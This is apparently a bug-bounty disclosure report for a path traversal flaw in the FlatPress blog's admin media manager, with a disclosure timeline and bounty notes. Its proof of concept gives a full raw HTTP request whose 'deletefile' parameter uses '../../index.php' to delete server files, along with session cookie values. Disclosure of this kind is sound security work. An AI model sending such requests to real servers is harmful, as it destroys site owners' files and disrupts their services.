File Deletion Detected in flatpressblog/flatpress
Valid
Reported on
Dec 24th 2022
Description
Vulnerability allows deleting files in the server, affect the logic of the source code or disrupt the program to make the original way of operation
Proof of Concept
B1. Login and access to admin.php?p=uploader&action=mediamanager
B2. Delete 1 uploaded file
B3. Change parameter `deletefile=attachs-{file path}
Exg: Delete the file index.php
GET /flatpress-master/admin.php?p=uploader&action=mediamanager&deletefile=attachs-../../index.php HTTP/1.1
Host: localhost
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/flatpress-master/admin.php?p=uploader&action=mediamanager
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: fpuser_fp-a37b0eea=admin; fppass_fp-a37b0eea=%242y%2410%2463YIyEccoLYf6kU0s.2lb.D1GcJ7GsnvoWR.aiWBX5alwZmXZpiMK; PHPSESSID=69js8mspjvh35iaud5vsb2sdfq; security_level=0; fpsess_fp-a37b0eea=81ft5fe9s1evbo5kaovh623v8u
Connection: close
Impact
Vulnerability allows deleting files in the server, affect the logic of the source code or disrupt the program to make the original way of operation
We are processing your report and will contact the
flatpressblog/flatpress
team within 24 hours.
5 months ago
We have contacted a member of the
flatpressblog/flatpress
team and are waiting to hear back
5 months ago
good find, thanks for reporting!
Juy Lang
has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
The fix bounty has been dropped
This vulnerability has been assigned a CVE
This vulnerability is scheduled to go public on
Mar 1st 2023
to join this conversation
